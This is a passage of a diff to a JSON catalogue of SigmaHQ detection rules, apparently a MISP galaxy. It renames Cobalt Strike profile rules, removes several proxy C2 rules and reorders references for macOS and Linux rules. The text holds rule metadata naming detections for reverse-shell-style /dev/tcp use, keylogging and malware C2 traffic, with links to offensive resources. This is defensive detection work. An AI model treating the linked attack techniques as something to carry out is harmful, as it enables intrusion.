Malleable Amazon Profile", + "description": "Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).", "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", + "author": "Markus Neis, Florian Roth (Nextron Systems)", + "creation_date": "2024/02/15", "falsepositive": [ "Unknown" ], - "filename": "proxy_cobalt_amazon.yml", + "filename": "proxy_hktl_cobalt_strike_malleable_c2_requests.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_cobalt_amazon.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml" ], "tags": [ "attack.defense_evasion", @@ -91557,8 +92074,8 @@ "type": "related-to" } ], - "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", - "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" + "uuid": "f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", + "value": "HackTool - CobaltStrike Malleable Profile Patterns - Proxy" }, { "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", @@ -91609,131 +92126,6 @@ "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "value": "PwnDrp Access" }, - { - "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_ocsp.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_cobalt_ocsp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", - "value": "CobaltStrike Malleable (OCSP) Profile" - }, - { - "description": "Detects Windows PowerShell Web Access", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2017/03/13", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents" - ], - "filename": "proxy_powershell_ua.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_powershell_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "c8557060-9221-4448-8794-96320e6f3e74", - "value": "Windows PowerShell User Agent" - }, - { - "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_java_class_download.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_java_class_download.yml" - ], - "tags": [ - "attack.initial_access" - ] - }, - "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", - "value": "Java Class Proxy Download" - }, - { - "description": "Detects Baby Shark C2 Framework communication patterns", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2021/06/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_baby_shark.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_baby_shark.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", - "value": "BabyShark Agent Pattern" - }, { "description": "Detects suspicious user agent strings user by hack tools in proxy logs", "meta": { @@ -91777,133 +92169,6 @@ "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", "value": "Hack Tool User Agent" }, - { - "description": "Detects suspicious user agent string of APT40 Dropbox tool", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/11/12", - "falsepositive": [ - "Old browsers" - ], - "filename": "proxy_apt40.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "Internal research from Florian Roth", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_apt40.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", - "value": "APT40 Dropbox Tool User Agent" - }, - { - "description": "Detects Ursnif C2 traffic.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ursnif_malware_c2_url.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ursnif_malware_c2_url.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1204.002", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", - "value": "Ursnif Malware C2 URL Pattern" - }, - { - "description": "Detects suspicious empty user agent strings in proxy logs", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_empty_ua.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/Carlos_Perez/status/883455096645931008", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_empty_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", - "value": "Empty User Agent" - }, { "description": "Detects a flashplayer update from an unofficial location", "meta": { @@ -91968,8 +92233,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", + "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_webdav_search_ms.yml" ], "tags": [ @@ -92044,8 +92309,8 @@ "logsource.category": "file_event", "logsource.product": "macos", "refs": [ - "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ @@ -92120,8 +92385,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://redcanary.com/blog/applescript/", "https://objective-see.org/blog/blog_0x4B.html", + "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" ], "tags": [ @@ -92204,8 +92469,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://redcanary.com/blog/applescript/", "https://ss64.com/osx/osacompile.html", + "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml" ], "tags": [ @@ -92238,10 +92503,10 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://ss64.com/osx/csrutil.html", - "https://objective-see.org/blog/blog_0x6D.html", - "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior", + "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", + "https://objective-see.org/blog/blog_0x6D.html", + "https://ss64.com/osx/csrutil.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" ], "tags": [ @@ -92274,9 +92539,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior", - "https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior", "https://ss64.com/osx/sw_vers.html", + "https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior", + "https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml" ], "tags": [ @@ -92309,10 +92574,10 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://ss64.com/osx/csrutil.html", - "https://objective-see.org/blog/blog_0x6D.html", - "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior", + "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", + "https://objective-see.org/blog/blog_0x6D.html", + "https://ss64.com/osx/csrutil.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" ], "tags": [ @@ -92345,8 +92610,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" ], "tags": [ @@ -92421,10 +92686,10 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior", - "https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior", "https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior", "https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior", + "https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" ], "tags": [ @@ -92591,8 +92856,8 @@ "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", - "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml", "https://ss64.com/osx/dsenableroot.html", + "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" ], "tags": [ @@ -92726,9 +92991,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ + "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/MythicAgents/typhon/", "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", - "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" ], "tags": [ @@ -92836,8 +93101,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://redcanary.com/blog/clipping-silver-sparrows-wings/", "https://www.manpagez.com/man/8/PlistBuddy/", + "https://redcanary.com/blog/clipping-silver-sparrows-wings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml" ], "tags": [ @@ -92919,9 +93184,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ + "https://linux.die.net/man/1/dd", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://linux.die.net/man/1/truncate", - "https://linux.die.net/man/1/dd", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" ], "tags": [ @@ -92988,12 +93253,12 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af", - "https://objective-see.org/blog/blog_0x62.html", "https://ss64.com/mac/system_profiler.html", - "https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf", + "https://objective-see.org/blog/blog_0x62.html", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af", + "https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" ], "tags": [ @@ -93135,8 +93400,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior", "https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior", + "https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml" ], "tags": [ @@ -93235,8 +93500,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" ], "tags": [ @@ -93293,8 +93558,8 @@ "logsource.product": "macos", "refs": [ "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", - "https://www.manpagez.com/man/8/firmwarepasswd/", "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://www.manpagez.com/man/8/firmwarepasswd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], "tags": [ @@ -93646,8 +93911,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://ss64.com/osx/dseditgroup.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos", + "https://ss64.com/osx/dseditgroup.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml" ], "tags": [ @@ -93714,8 +93979,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml", "https://redcanary.com/blog/clipping-silver-sparrows-wings/", + "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml" ], "tags": [ @@ -93875,8 +94140,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" ], @@ -94033,9 +94298,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ + "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/MythicAgents/typhon/", "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", - "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml" ], "tags": [ @@ -94092,10 +94357,10 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], "tags": [ @@ -94116,9 +94381,9 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], "tags": "No established tags" @@ -94139,9 +94404,9 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], "tags": [ @@ -94579,8 +94844,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ @@ -94646,9 +94911,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" ], "tags": [ @@ -94717,8 +94982,8 @@ "logsource.product": "linux", "refs": [ "https://www.glitch-cat.com/p/green-lambert-and-attack", - "https://objective-see.org/blog/blog_0x68.html", "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", + "https://objective-see.org/blog/blog_0x68.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml" ], "tags": [ @@ -94751,8 +95016,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://imagemagick.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://linux.die.net/man/1/import", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], @@ -94786,8 +95051,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" ], "tags": [ @@ -94931,8 +95196,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://blog.aquasec.com/container-security-tnt-container-attack", + "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml" ], "tags": [ @@ -94965,8 +95230,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/Neo23x0/auditd/blob/master/audit.rules", "Self Experience", + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" ], "tags": [ @@ -95540,8 +95805,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", "https://linux.die.net/man/1/xwd", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ @@ -95607,9 +95872,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://man7.org/linux/man-pages/man1/passwd.1.html", "https://linux.die.net/man/1/chage", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], @@ -95711,9 +95976,9 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ @@ -95820,9 +96085,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ @@ -95855,9 +96120,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", "https://book.hacktricks.xyz/shells/shells/linux", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ @@ -96014,8 +96279,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://redcanary.com/blog/ebpf-malware/", "https://man7.org/linux/man-pages/man7/bpf-helpers.7.html", + "https://redcanary.com/blog/ebpf-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml" ], "tags": [ @@ -96161,9 +96426,9 @@ "logsource.category": "No established category", "logsource.product": 